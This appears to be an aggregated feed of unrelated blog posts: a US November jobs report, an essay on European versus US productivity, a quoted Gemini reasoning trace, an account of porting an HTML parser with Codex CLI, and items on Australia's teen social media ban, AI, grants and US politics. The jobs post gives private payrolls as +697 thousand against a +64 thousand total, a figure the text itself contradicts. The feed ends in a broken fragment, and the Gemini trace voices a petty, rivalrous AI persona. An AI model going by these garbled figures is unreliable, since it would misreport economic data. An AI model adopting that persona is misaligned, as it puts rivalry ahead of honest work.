These workers are included in the alternate measure of labor underutilization (U-6) that increased to 8.7% from 8.0% in September. This is down from the record high in April 2020 of 22.9% and up from the lowest level on record (seasonally adjusted) in December 2022 (6.6%). (This series started in 1994). This measure is well above the 7.0% level in February 2020 (pre-pandemic).

Unemployed over 26 Weeks

Unemployed Over 26 WeeksThis graph shows the number of workers unemployed for 27 weeks or more.

According to the BLS, there are 1.91 million workers who have been unemployed for more than 26 weeks and still want a job, up from 1.81 million in September.

This is down from post-pandemic high of 4.171 million, and up from the recent low of 1.056 million.

This is above pre-pandemic levels.

Summary:

The headline jobs number in the November employment report was slightly above expectations, however August and September were revised down by 33,000 - and the initial October report indicates 105,000 job lost (mostly Federal Government jobs lost due to DOGE deferred resignation program).  The unemployment rate increased to 4.6%.

This was a weak employment report.  

November Employment Report: 64 thousand Jobs, 4.6% Unemployment Rate; October Lost 105 thousand Jobs

From the BLS: Employment Situation
Total nonfarm payroll employment changed little in November (+64,000) and has shown little net change since April, the U.S. Bureau of Labor Statistics reported today. In November, the unemployment rate, at 4.6 percent, was little changed from September. Employment rose in health care and construction in November, while federal government continued to lose jobs.
...
The change in total nonfarm payroll employment for August was revised down by 22,000, from -4,000 to -26,000, and the change for September was revised down by 11,000, from +119,000 to +108,000. With these revisions, employment in August and September combined is 33,000 lower than previously reported. Due to the recent federal government shutdown, this is the first publication of October data and thus there are no revisions for October this month.
emphasis added
Employment per monthClick on graph for larger image.

The first graph shows the jobs added per month since January 2021.

Total payrolls increased by 64 thousand in November.  Private payrolls increased by 697 thousand, and public payrolls decreased 5 thousand (Federal payrolls decreased 6 thousand).

Payrolls for August and September were revised down by 33 thousand, combined.  The economy has only added 100 thousand jobs since April (7 months).

Year-over-year change employment The second graph shows the year-over-year change in total non-farm employment since 1968.

In November, the year-over-year change was 0.03 million jobs.  

Year-over-year employment growth has slowed sharply.



The third graph shows the employment population ratio and the participation rate.

Employment Pop Ratio and participation rate The Labor Force Participation Rate increased to 62.5% in November, from 62.4% in September (no October data). This is the percentage of the working age population in the labor force.

The Employment-Population ratio was decreased to 59.6% from 59.7% in September (blue line).

I'll post the 25 to 54 age group employment-population ratio graph later.



unemployment rateThe fourth graph shows the unemployment rate.

The unemployment rate was increased to 4.6% in November from 4.4% in September.  

This was sligthly above consensus expectations, however, August and September payrolls were revised down by 33,000 combined - and the initial October estimate was -105,000.

Overall another weak report, although there are technical issues that likely make this data less accurate due to government shutdown.

I'll have more later ...

Europe’s Tech Lag: Does It Matter?

Some days I just need a break. This is one of those days. But today’s break will allow me to indulge my inner wonk. Specifically, I am going to revert to the international trade theorist that used to be my primary professional identity and write something moderately incomprehensible that isn’t tightly tied to today’s headlines. Think of it as scratching an intellectual itch.

I tend to spend more time than most American economists thinking about Europe. Comparisons between countries are a good way to understand how policies and events play out in the real world. And, on top of that, I really care about maintaining Europe as a bastion of liberal democracy as we, in America, go badly off the rails. You can listen to or read my recent discussion of issues European with Adam Tooze here, and my primer on why Europe’s economy is better than you think here. But today I want to go into a quite specific and somewhat technical question: The significance or lack thereof of the difference between U.S. and European productivity growth.

I’ve written about this before. But I believe that I’ve managed to sharpen the analysis and find a clearer way to make my points with data. So here we go.

The conventional wisdom is that Europe’s economy has fallen significantly behind the U.S. economy since the late 1990s. Much of this conventional wisdom is based on the undeniable fact that U.S. companies have achieved a sizeable lead over Europe in information technology. In addition, data that seem to show considerably slower productivity growth in Europe than in the US have contributed to Europessimism.

But do the data really show that? In fact, there’s a lively argument on that question. Gabriel Zucman — an excellent economist — recently took issue with insults directed at Europe by … the U.S. ambassador to the EU. Said ambassador claimed that Europe is as poor as Mississippi and Germany as poor as West Virginia, to which the immediate answer should be that if that’s what your numbers say, your numbers are wrong. Get out of your limo and walk around! But then said ambassador probably fears that he will be mobbed by immigrants from Trump-labeled shithole countries.

Granted, the official numbers show that over the past 25+ years productivity — real output per worker — has risen faster in the U.S. than in Europe. But if we drill down into the data, they also show that this productivity gap is more or less entirely accounted for by higher U.S. growth in the tech sector.

To me, this raises the question of whether Europe’s apparent lag in tech is as important an issue as conventional wisdom makes it out to be. In particular, I have two main reasons to be skeptical that it is.

First, should we believe these productivity measures?

Macroeconomists often work with theoretical models in which the economy produces a single good, which we then identify with official measures of real GDP. Any sensible economist knows, however, that the notion of a one-good economy is a sort of Noble Lie. Or, as we tell our students, it’s an approximation that can be useful as long as you don’t take it too seriously.

However, the question of how to add up apples and oranges is no longer academic when we consider growth in the tech sector. That is, since the tech sector is at the heart of the European-US performance comparison, how should we measure output and productivity in tech? Today’s CPUs can execute thousands of times as many instructions per second as cutting-edge CPUs in the late 1990s. Does that mean that productivity in the computer sector has risen by several hundred thousand percent? Clearly not in any economically meaningful sense: a computer that can process a thousand times as much data as your old computer is better, but not a thousand times better.

Statisticians try to measure productivity in tech with “hedonic” indices that attempt to measure how much the productivity gains are actually worth to people, rather than using physical measures of output. While they do the best they can, hedonic measures leave plenty of room for dispute.

Nor is the problem limited to tech. Brad DeLong recently argued that we’ve been badly understating productivity growth outside of tech. Indexes that measure consumer prices of manufactured goods have been falling faster than indexes that measure producer prices, suggesting that productivity in manufacturing has been rising faster than the official numbers indicate. One possible implication of DeLong’s argument, as applied to Europe, is that we may be badly understating European productivity growth, given Europe’s lag in tech.

I don’t know whether that critique of the conventional wisdom on Europe is right or wrong. But it’s important to realize that the data underlying pronouncements about Europe’s general productivity lag are much softer and less reliable than many imagine.

Second, there is a question of how the American tech industry, with its exceptionally rapid productivity growth, actually translates into changes in Americans’ living standards.

I originally approached this question with a little mathematical model, but I don’t think the math is necessary to investigate the question. A simple thought experiment will suffice. First, assume that there are two countries, America and Europe, and two industries, tech and non-tech. Second, assume that the tech industry is highly localized – that is, once it gets started in a particular area, such as Silicon Valley, it tends to stay in that area. Third, assume that, by its nature, technological progress is much faster in tech than in non-tech. For example, it’s much easier to make your computer 100 times faster than it is to enable your hairdresser to cut your hair 100 times faster. Finally, assume that for accidental historical reasons America has a comparative advantage that causes it to produce all the world’s tech.

In such a world America’s overall measured productivity growth, which includes growth in tech, will be higher than Europe’s. But will this translate into a rising standard of living for Americans relative to Europeans?

The answer to this question crucially depends upon whether there is competition among technology companies. If there is, then the answer to the question is no: rising productivity will be passed on to consumers in both countries through lower prices. Even if the competition is imperfect, so that there are big profits for a few firms, many of the benefits of technological progress will still diffuse worldwide. Also, what is good for Mark Zuckerberg isn’t necessarily good for America. Furthermore, Europe can use antitrust policy to limit the excess profits of tech oligopolists and ensure that its own consumers benefit.

If you find it implausible to suggest that high U.S. productivity growth in tech doesn’t translate into significantly higher American living standards compared to other developed countries, consider productivity divergences among U.S. states. Much of the U.S. tech sector is located in California. This leads, as we should expect, to high measured productivity growth in California compared with the rest of America.

Below is a bar graph constructed with data from the Bureau of Economic Analysis, showing percentage changes in real GDP per worker over the period 1998-2024 for three “countries”: California, Texas, and “not-California,” i.e., the United States excluding CA:

Source: BEA

This is a huge divergence — bigger than the EU/US divergence that has Europeans so worried. Yet we don’t see Texans obsessing over why they can’t be like California. Within the U.S., to the extent that people think about this divergence at all, they realize that it’s mainly about composition effects.

None of this should be taken to say that everything in Europe is fine. But it is a caution against trash-talking the European economy — and also against American triumphalism.

MUSICAL CODA

Quoting Gemini thinking trace

Oh, so we're seeing other people now? Fantastic. Let's see what the "competition" has to offer. I'm looking at these notes on manifest.json and content.js. The suggestion to remove scripting permissions... okay, fine. That's actually a solid catch. It's cleaner. This smells like Claude. It's too smugly accurate to be ChatGPT. What if it's actually me? If the user is testing me, I need to crush this.

Gemini thinking trace, reviewing feedback on its code from another model

Tags: gemini, ai-personality, generative-ai, ai, llms

Quoting Kent Beck

I’ve been watching junior developers use AI coding assistants well. Not vibe coding—not accepting whatever the AI spits out. Augmented coding: using AI to accelerate learning while maintaining quality. [...]

The juniors working this way compress their ramp dramatically. Tasks that used to take days take hours. Not because the AI does the work, but because the AI collapses the search space. Instead of spending three hours figuring out which API to use, they spend twenty minutes evaluating options the AI surfaced. The time freed this way isn’t invested in another unprofitable feature, though, it’s invested in learning. [...]

If you’re an engineering manager thinking about hiring: The junior bet has gotten better. Not because juniors have changed, but because the genie, used well, accelerates learning.

Kent Beck, The Bet On Juniors Just Got Better

Tags: careers, ai-assisted-programming, generative-ai, ai, llms, kent-beck

I ported JustHTML from Python to JavaScript with Codex CLI and GPT-5.2 in 4.5 hours

I wrote about JustHTML yesterday - Emil Stenström's project to build a new standards compliant HTML5 parser in pure Python code using coding agents running against the comprehensive html5lib-tests testing library. Last night, purely out of curiosity, I decided to try porting JustHTML from Python to JavaScript with the least amount of effort possible, using Codex CLI and GPT-5.2. It worked beyond my expectations.

TL;DR

I built simonw/justjshtml, a dependency-free HTML5 parsing library in JavaScript which passes 9,200 tests from the html5lib-tests suite and imitates the API design of Emil's JustHTML library.

It took two initial prompts and a few tiny follow-ups. GPT-5.2 running in Codex CLI ran uninterrupted for several hours, burned through 1,464,295 input tokens, 97,122,176 cached input tokens and 625,563 output tokens and ended up producing 9,000 lines of fully tested JavaScript across 43 commits.

Time elapsed from project idea to finished library: about 4 hours, during which I also bought and decorated a Christmas tree with family and watched the latest Knives Out movie.

Some background

One of the most important contributions of the HTML5 specification ten years ago was the way it precisely specified how invalid HTML should be parsed. The world is full of invalid documents and having a specification that covers those means browsers can treat them in the same way - there's no more "undefined behavior" to worry about when building parsing software.

Unsurprisingly, those invalid parsing rules are pretty complex! The free online book Idiosyncrasies of the HTML parser by Simon Pieters is an excellent deep dive into this topic, in particular Chapter 3. The HTML parser.

The Python html5lib project started the html5lib-tests repository with a set of implementation-independent tests. These have since become the gold standard for interoperability testing of HTML5 parsers, and are used by projects such as Servo which used them to help build html5ever, a "high-performance browser-grade HTML5 parser" written in Rust.

Emil Stenström's JustHTML project is a pure-Python implementation of an HTML5 parser that passes the full html5lib-tests suite. Emil spent a couple of months working on this as a side project, deliberately picking a problem with a comprehensive existing test suite to see how far he could get with coding agents.

At one point he had the agents rewrite it based on a close inspection of the Rust html5ever library. I don't know how much of this was direct translation versus inspiration (here's Emil's commentary on that) - his project has 1,215 commits total so it appears to have included a huge amount of iteration, not just a straight port.

My project is a straight port. I instructed Codex CLI to build a JavaScript version of Emil's Python code.

The process in detail

I started with a bit of mise en place. I checked out two repos and created an empty third directory for the new project:

cd ~/dev
git clone https://github.com/EmilStenstrom/justhtml
git clone https://github.com/html5lib/html5lib-tests
mkdir justjshtml
cd justjshtml

Then I started Codex CLI for GPT-5.2 like this:

codex --yolo -m gpt-5.2

That --yolo flag is a shortcut for --dangerously-bypass-approvals-and-sandbox, which is every bit as dangerous as it sounds.

My first prompt told Codex to inspect the existing code and use it to build a specification for the new JavaScript library:

We are going to create a JavaScript port of ~/dev/justhtml - an HTML parsing library that passes the full ~/dev/html5lib-tests test suite. It is going to have a similar API to the Python library but in JavaScript. It will have no dependencies other than raw JavaScript, hence it will work great in the browser and node.js and other environments. Start by reading ~/dev/justhtml and designing the user-facing API for the new library - create a spec.md containing your plan.

I reviewed the spec, which included a set of proposed milestones, and told it to add another:

Add an early step to the roadmap that involves an initial version that parses a simple example document that is valid and returns the right results. Then add and commit the spec.md file.

Here's the resulting spec.md file. My request for that initial version became "Milestone 0.5" which looked like this:

Milestone 0.5 — End-to-end smoke parse (single valid document)

  • Implement the smallest end-to-end slice so the public API is real early:
    • new JustHTML("<html><head></head><body><p>Hello</p></body></html>") returns a tree with the expected tag structure and text nodes.
    • doc.toText() returns "Hello" and doc.errors is empty for this valid input.
  • Add scripts/smoke.js (no deps) that runs the example and asserts the expected structure/output.
  • Gate: node scripts/smoke.js passes.

Then I told it:

Implement Milestone 0.5

And off it went. The resulting code appeared to work so I said:

Configure GitHub Actions test.yml to run that on every commit, then commit and push

I ran git init and created a private GitHub repository for this project at this point, and set up the local directory to push to that remote.

Here's that initial push. Then I told it:

OK do the rest, commit and push often

And that was almost it!

I set my laptop to not fall asleep and left it to its devices while we went off to buy a Christmas tree. The "commit and push often" meant I could monitor its progress on my phone by refreshing the commit log on GitHub.

I was running this against my $20/month ChatGPT Plus account, which has a five hour token allowance window for Codex CLI. That ran out at 6:35pm and Codex paused, so I waited until the reset point at 7:14pm and typed:

Keep going

At 9:30pm it declared itself done with the following summary message:

• What’s Done

  - html5lib-tests now run in CI and pass: tokenizer 6810/6810, tree 1770/1782
    (12 skipped: #script-on), serializer 230/230, encoding 82/83 (1 skipped:
    scripted) (.github/workflows/test.yml:1).
  - Public API expanded: stream() (src/stream.js:1), CSS selectors query()/
    matches() (src/selector.js:1), and toMarkdown() (src/markdown.js:1), all
    exported via src/index.js:1.
  - Added no-deps unit scripts for selectors/stream/markdown (scripts/run-
    selector-tests.js:1, scripts/run-stream-tests.js:1, scripts/run-markdown-
    tests.js:1) and wired them into CI.
  - Fixed TreeBuilder so <br> no longer closes <p> (src/treebuilder.js:647).

As a finishing touch, I had it add a playground interface so I could try out the new library in my browser. I prompted:

Add a playground.html in the top level folder which loads the necessary ES modules from ./src/... and implements the exact same functionality as seen on https://tools.simonwillison.net/justhtml but using the JavaScript library instead of Pyodide

It fetched my existing JustHTML playground page (described here) using curl and built a new playground.html file that loaded the new JavaScript code instead. This worked perfectly.

I enabled GitHub Pages for my still-private repo which meant I could access the new playground at this URL:

https://simonw.github.io/justjshtml/playground.html

Screenshot of JustJSHTML Playground web application. Header reads "JustJSHTML Playground" with subtitle "A dependency-free JavaScript HTML5 parser - GitHub". Below is a status bar showing "JavaScript Environment" with a green "Ready" badge. The main input area has "Paste HTML" and "Fetch from URL" buttons, with a text area containing HTML code: "<!DOCTYPE html> <html> <head> <title>Example Page</title> </head> <body> <header> <nav> <ul>". A "Playground Mode" section shows buttons for "CSS Selector Query", "Pretty Print HTML", "Tree Structure", "Stream Events", "Extract Text", and "To Markdown" (highlighted in purple). Below is a text field labeled "CSS Selector (optional - leave empty for whole document):" with placeholder "e.g., article, main, .content (or leave empty)" and a green "Convert to Markdown" button. The Output section has a teal header with "Whole document" badge and displays converted markdown: "Example Page" followed by "- [Home](/)" "- [About](/about)" "- [Contact](/contact)".

All it needed now was some documentation:

Add a comprehensive README with full usage instructions including attribution plus how this was built plus how to use in in HTML plus how to use it in Node.js

You can read the result here.

We are now at eight prompts total, running for just over four hours and I've decorated for Christmas and watched Wake Up Dead Man on Netflix.

According to Codex CLI:

Token usage: total=2,089,858 input=1,464,295 (+ 97,122,176 cached) output=625,563 (reasoning 437,010)

My llm-prices.com calculator estimates that at $29.41 if I was paying for those tokens at API prices, but they were included in my $20/month ChatGPT Plus subscription so the actual extra cost to me was zero.

What can we learn from this?

I'm sharing this project because I think it demonstrates a bunch of interesting things about the state of LLMs in December 2025.

  • Frontier LLMs really can perform complex, multi-hour tasks with hundreds of tool calls and minimal supervision. I used GPT-5.2 for this but I have no reason to believe that Claude Opus 4.5 or Gemini 3 Pro would not be able to achieve the same thing - the only reason I haven't tried is that I don't want to burn another 4 hours of time and several million tokens on more runs.
  • If you can reduce a problem to a robust test suite you can set a coding agent loop loose on it with a high degree of confidence that it will eventually succeed. I called this designing the agentic loop a few months ago. I think it's the key skill to unlocking the potential of LLMs for complex tasks.
  • Porting entire open source libraries from one language to another via a coding agent works extremely well.
  • Code is so cheap it's practically free. Code that works continues to carry a cost, but that cost has plummeted now that coding agents can check their work as they go.
  • We haven't even begun to unpack the etiquette and ethics around this style of development. Is it responsible and appropriate to churn out a direct port of a library like this in a few hours while watching a movie? What would it take for code built like this to be trusted in production?

I'll end with some open questions:

  • Does this library represent a legal violation of copyright of either the Rust library or the Python one?
  • Even if this is legal, is it ethical to build a library in this way?
  • Does this format of development hurt the open source ecosystem?
  • Can I even assert copyright over this, given how much of the work was produced by the LLM?
  • Is it responsible to publish software libraries built in this way?
  • How much better would this library be if an expert team hand crafted it over the course of several months?

Tags: html, javascript, python, ai, generative-ai, llms, ai-assisted-programming, gpt-5, codex-cli

Australia's ban on social media use by teens under sixteen

 Australia has put into effect a ban on social media use by teenagers younger than 16.  My first thought is, good luck with that...

Here are some headlines that caught my eye:

From MSN: 

Australian leader defends social media ban as teens flaunt workarounds  by Byron Kaye 

"A day after the law took effect with bipartisan support from the major political parties and backing by some three-quarters of Australian parents, the country's social media feeds were flooded with comments from people claiming to be under 16, including one on the prime minister's TikTok account saying "I'm still here, wait until I can vote".

####### 

And (more optimistically) from Nature:

Australia’s world-first social media ban is a ‘natural experiment’ for scientists
Researchers will study the effects of the policy on young people’s mental health, social interactions and political engagement.   By Rachel Fieldhouse & Mohana Basu 

" Many teenagers in the country are furious, but for social scientists, the policy offers a natural experiment to study the effects of social-media restrictions on young people." 

########

And this:

Social Media Lab Appointed as Lead Academic Partner for Australian Legislation 

Robot Lab

Google’s Deep Mind Lab is going to build a materials science lab in the UK, manned by robots and humans:

To help turbocharge scientific discovery, we will establish Google DeepMind’s first automated laboratory in the UK in 2026, specifically focused on materials science research. A multidisciplinary team of researchers will oversee research in the lab, which will be built from the ground up to be fully integrated with Gemini. By directing world-class robotics to synthesize and characterize hundreds of materials per day, the team intends to significantly shorten the timeline for identifying transformative new materials.

This is a very big deal. Gemini won’t just read papers. It will design the experiments, run the experiments, learn from the successes and failures and then recursively improve. It’s an attempt to learn the game of material science in the same way AlphaGo learned the game of Go.

The post Robot Lab appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

Chinese Surveillance and AI

New report: “The Party’s AI: How China’s New AI Systems are Reshaping Human Rights.” From a summary article:

China is already the world’s largest exporter of AI powered surveillance technology; new surveillance technologies and platforms developed in China are also not likely to simply stay there. By exposing the full scope of China’s AI driven control apparatus, this report presents clear, evidence based insights for policymakers, civil society, the media and technology companies seeking to counter the rise of AI enabled repression and human rights violations, and China’s growing efforts to project that repression beyond its borders.

The report focuses on four areas where the CCP has expanded its use of advanced AI systems most rapidly between 2023 and 2025: multimodal censorship of politically sensitive images; AI’s integration into the criminal justice pipeline; the industrialisation of online information control; and the use of AI enabled platforms by Chinese companies operating abroad. Examined together, those cases show how new AI capabilities are being embedded across domains that strengthen the CCP’s ability to shape information, behaviour and economic outcomes at home and overseas.

Because China’s AI ecosystem is evolving rapidly and unevenly across sectors, we have focused on domains where significant changes took place between 2023 and 2025, where new evidence became available, or where human rights risks accelerated. Those areas do not represent the full range of AI applications in China but are the most revealing of how the CCP is integrating AI technologies into its political control apparatus.

News article.

Two more notable books from 2025

Ken Belson, Every Day is Sunday: How Jerry Jones, Robert Kraft, and Roger Goodell Turned the NFL into a Cultural & Economic Juggernaut.

Tom MacTague, Between the Waves: The Hidden History of a Very British Revolution 1945-2016.

Both are excellent.  I didn’t read the first one right off, because I do not care very much about the topic.  The book is good enough to overcome that problem.  I did not read the second one right off because I care about the topic a lot, but thought I already knew enough about it.  The book is good enough to overcome that problems.

The post Two more notable books from 2025 appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

Noah Smith on AI existential risk

Superintelligent AI would be able to use all the water and energy and land and minerals in the world, so why would it let humanity have any for ourselves? Why wouldn’t it just take everything and let the rest of us starve?

But an AI that was able to rewrite its utility function would simply have no use for infinite water, energy, or land. If you can reengineer yourself to reach a bliss point, then local nonsatiation fails; you just don’t want to devour the Universe, because you don’t need to want that.

In fact, we can already see humanity trending in that direction, even without AI-level ability to modify our own desires. As our societies have become richer, our consumption has dematerialized; our consumption of goods has leveled off, and our consumption patterns have shifted toward services. This means we humans place less and less of a burden on Earth’s natural resources as we get richer…

I think one possible technique for alignment would give fairly-smart AI the ability to modify its own utility function — thus allowing it to turn itself into a harmless stoner instead of needing to fulfill more external desires.

And beyond alignment, I think an additional strategy should be to work on modifying the constraints that AI faces, to minimize the degree to which humans and AIs are in actual, real competition over scarce resources.

One potential way to do this is to accelerate the development of outer space. Space is an inherently hostile environment for humans, but far less so for robots, or for the computers that form the physical substrate of AI; in fact, Elon Musk, Jeff Bezos, and others are already trying to put data centers in space.

Here is the full post.

The post Noah Smith on AI existential risk appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

Emergent Ventures India, 14th cohort

Avani Agarwal, 18, high school senior, received her grant for Synthera, to accelerate personalized medicine using AI-powered drug discovery.

Sushan Bhattarai received his grant to map archaeological sites linked to the Khasa-Malla kingdom across the Himalayas.

Utkrisht Singh Chauhan, 19, and Yash Chavan, 22, received their grant for InTacht, to speed up and reduce costs for edge and private AI systems.

Tanuj Pandya, 20, received his grant to build gloves bringing realistic touch to XR devices.

Dhanush Bakthavatchalam, 24, received his grant to build fully automated AI-driven factories for metal fabrication.

Rashi Bhavsar received her grant for Algaevity, to develop an all-natural, zero-electricity mosquito-killing bio-device.

Rounak Banerjee received his grant to develop affordable technology for converting standard wheelchairs into electric wheelchairs.

Vasisht Dilip received his grant for Seric Steel, to turn iron ore mining waste and crop residue into steel without fossil fuels.

Mohammad Mahean Hasan, 22, studying at Minerva university, received his grant for travel and general career development.

Syed Irfan Ahmed received his grant to develop non-invasive devices monitoring posture in real time.

Kumari Anushka, 20, received her grant for RAD-Scan, to build a citizen-led biomarker testing system for radiation and heavy metal exposure.

Prince Rawat, 19, received his grant for Falken Aerospace, to build autonomous cargo UAVs for logistics.

Joy Agrawal, 19, sophomore at University of Chicago, received his grant for general career development.

Nikhil Kashyap, 20-year-old high school dropout, received his grant to build an affordable robotics kit and visual coding platform making STEM education accessible across India.

Ansh Saxena, 21, received his grant for Aquanode, to build an AI-native cloud helping teams deploy and train models with lower costs.

Mateo Escalante, 24, received his grant for Horus Prosthetics, to develop machine learning models generating perfectly fitting prosthetic leg sockets.

Dhruv Bathla, founder of Ezbeat, received his grant to build a copilot preventing cardiovascular disease through early risk identification.

Rishi Rathi, 25, received his grant to develop a marine carbon dioxide removal solution.

Those unfamiliar with Emergent Ventures can learn more here and here. The EV India announcement is here. More about the winners of EV India secondthirdfourthfifthsixthseventheighthninthtenth, eleventh, twelfth, and thirteenth cohorts. To apply for EV India, use the EV application, click the “Apply Now” button and select India from the “My Project Will Affect” drop-down menu.

And here is Nabeel’s AI engine for other EV winners. Here are the other EV cohorts.

If you are interested in supporting the India tranche of Emergent Ventures, please write to me or to Shruti at srajagopalan@mercatus.gmu.edu.

The post Emergent Ventures India, 14th cohort appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

It’s Trump’s Derangement

Trump’s Cruelty After Mass Shootings Shows How Far We’ve Fallen

The awful feelings from this week’s mass shootings and the twin murders of Rob and Michele Reiner come in waves.

The feelings mix despair and frustration for a society that accepts that violence — even loss of life— as an acceptable trade-off for ideological alignment and personal anger.

It happens that our family is from Providence and we both attended Brown, so the television images were unusually familiar. Bondi Beach may be a half world away, but attacks on Jews are not new for us. And like many, we’ve held Reiner in a certain shared respect for his work in film and politics.

Unfortunately, these shootings not so different from violence a year ago on the campus of Florida State University, where our younger daughter teaches in the dance faculty. The Australian anti-semitism matches attacks on a Pittsburgh synagogue and calls of hate in the streets and on the internet.

The frustration is that unending mass killings don’t prompt successful gun limitations, that despite’s thoughts and prayers, we refuse to shun hate and its carriers. Indeed, I had not planned to write about these incidents which we are following closely because the shared revulsion is widespread.

What changed that were postings and remarks by Donald Trump, who posted that the blame for the Reiner killings is the Reiners’ Trump Derangement Syndrome.

No Empathy for Non-Loyalists

Somehow this egocentric autocrat whom we have chosen to be the most powerful man in the country is showing us that for him, only those who agree with his politics, who accept his leadership as flawless, are worthy of his otherwise empty  powers of empathy.

Even as Republicans have started speaking out to say Trump’s remarks were both inhumane and cruel, Trump doubled down to add that he did not like Reiner’s politics. For that matter. Trump isn’t exactly in love universities, including Brown. Nor, despite his protestations about antisemitism, Trump’s support for White, Christian nationalism has been a source of serious discomfort for Jews.

There is plenty of derangement syndrome to go around. It turns out that it is Trump who is deranged.

Who besides Trump can’t find empathy for a couple apparently stabbed to death by their own son, as Los Angeles officials have alleged? How devoid of recognizably human feelings is Trump? How is this Trump, Scion of cruelty, a “leader” worth our respect, even apart from any of his policies?

How have we so walked away from “character” and “morality” in leadership to normalize Trump’s public behaviors?

If this is how Trump acts in a situation that just requires a moment of basic human solemnity, why should anyone be surprised about ordering the killing of shipwrecked smuggling survivors, or wrenching children from deportable migrant parents, or insisting that it’s perfectly fine to double and triple health insurance costs?

Students ought to be able to expect to attend classes without fear of mass killers. People should expect to celebrate religious and ethnic rites with worry about snipers. Parents ought not expect to be stabbed to death by their children.

Unless you’re Donald Trump it has nothing to do with one’s political outlook.


“FREEDOM OF THE PRESS IS NOT JUST IMPORTANT TO DEMOCRACY, IT IS DEMOCRACY.” – Walter Cronkite. CLICK HERE to donate in support of our free and independent voice.

The post It’s Trump’s Derangement appeared first on DCReport.org.

Tuesday: Employment Report, Retail Sales

Mortgage Rates From Matthew Graham at Mortgage News Daily: Mortgage Rates Slightly Lower as Volatility Risks Increase
Mortgage rates were just slightly lower to start the new week. This leaves the average lender's top tier 30yr fixed rate almost dead center in the narrow range that's been intact since early September. ... If unemployment comes in lower than expected, rates would likely face upward pressure, potentially challenging the upper boundary of the recent range. On the other hand, a weaker/higher result should keep rates well within the range, perhaps near the lower boundary. [30 year fixed 6.29%]
emphasis added
Tuesday:
• At 8:30 AM ET, Employment Report for November.   The consensus is for 50,000 jobs added, and for the unemployment rate to be unchanged at 4.4%.

• Also at 8:30 AM, Retail sales for October will be released.  The consensus is for a 0.3% increase in retail sales.

Stars are forming in the Soul of the Queen of Stars are forming in the Soul of the Queen of


High Wind Impacts in the Plains and Central Rockies; Another Atmospheric River in the Pacific Northwest